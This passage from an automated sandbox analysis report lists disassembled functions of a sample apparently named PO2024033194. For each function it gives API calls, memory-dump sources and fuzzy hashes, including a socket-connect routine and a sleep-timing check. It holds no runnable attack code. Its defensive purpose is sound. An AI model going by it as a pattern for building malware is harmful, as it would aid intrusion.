                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$_wcslen$_wcspbrk
                                                                  • String ID:
                                                                  • API String ID: 1856069659-0
                                                                  • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                  • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                  • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                  • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                  Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 004478E2
                                                                  • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                  • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                  • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                  • TrackPopupMenuEx.USER32(00906360,00000000,00000000,?,?,00000000), ref: 00447991
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CursorMenuPopupTrack$Proc
                                                                  • String ID:
                                                                  • API String ID: 1300944170-0
                                                                  • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                  • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                  • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                  • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                  Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClientRect.USER32(?,?), ref: 004479CC
                                                                  • GetCursorPos.USER32(?), ref: 004479D7
                                                                  • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                  • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                  • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 1822080540-0
                                                                  • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                  • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                  • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                  • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                  Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                  • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                  • EndPaint.USER32(?,?), ref: 00447D13
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                  • String ID:
                                                                  • API String ID: 659298297-0
                                                                  • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                  • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                  • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                  • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                  Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                    • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                    • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                    • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                    • Part of subcall function 00440D98: SendMessageW.USER32(00901B60,000000F1,00000000,00000000), ref: 00440E6E
                                                                    • Part of subcall function 00440D98: SendMessageW.USER32(00901B60,000000F1,00000001,00000000), ref: 00440E9A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$EnableMessageSend$LongShow
                                                                  • String ID:
                                                                  • API String ID: 142311417-0
                                                                  • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                  • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                  • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                  • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                  Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                  • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                  • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                  • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                  Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 00445879
                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                  • _wcslen.LIBCMT ref: 004458FB
                                                                  • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                  • String ID:
                                                                  • API String ID: 3087257052-0
                                                                  • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                  • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                  • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                  • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                  Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                  • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                  • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                  • String ID:
                                                                  • API String ID: 245547762-0
                                                                  • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                  • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                  • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                  • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                  Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                  • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                  • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                  • BeginPath.GDI32(?), ref: 0044723D
                                                                  • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Select$BeginCreateDeletePath
                                                                  • String ID:
                                                                  • API String ID: 2338827641-0
                                                                  • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                  • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                  • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                  • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                  Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000), ref: 00434598
                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                  • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CounterPerformanceQuerySleep
                                                                  • String ID:
                                                                  • API String ID: 2875609808-0
                                                                  • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                  • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                  • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                  • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                  Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                  • MessageBeep.USER32(00000000), ref: 00460C46
                                                                  • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                  • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                  • String ID:
                                                                  • API String ID: 3741023627-0
                                                                  • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                  • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                  • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                  • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                  Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Destroy$DeleteObjectWindow$Icon
                                                                  • String ID:
                                                                  • API String ID: 4023252218-0
                                                                  • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                  • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                  • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                  • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                  Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                  • DeleteObject.GDI32(?), ref: 00455736
                                                                  • DeleteObject.GDI32(?), ref: 00455744
                                                                  • DestroyIcon.USER32(?), ref: 00455752
                                                                  • DestroyWindow.USER32(?), ref: 00455760
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                  • String ID:
                                                                  • API String ID: 1489400265-0
                                                                  • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                  • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                  • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                  • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                  Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                  • DestroyWindow.USER32(?), ref: 00455728
                                                                  • DeleteObject.GDI32(?), ref: 00455736
                                                                  • DeleteObject.GDI32(?), ref: 00455744
                                                                  • DestroyIcon.USER32(?), ref: 00455752
                                                                  • DestroyWindow.USER32(?), ref: 00455760
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                  • String ID:
                                                                  • API String ID: 1042038666-0
                                                                  • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                  • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                  • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                  • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                  Function 0042FD29 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
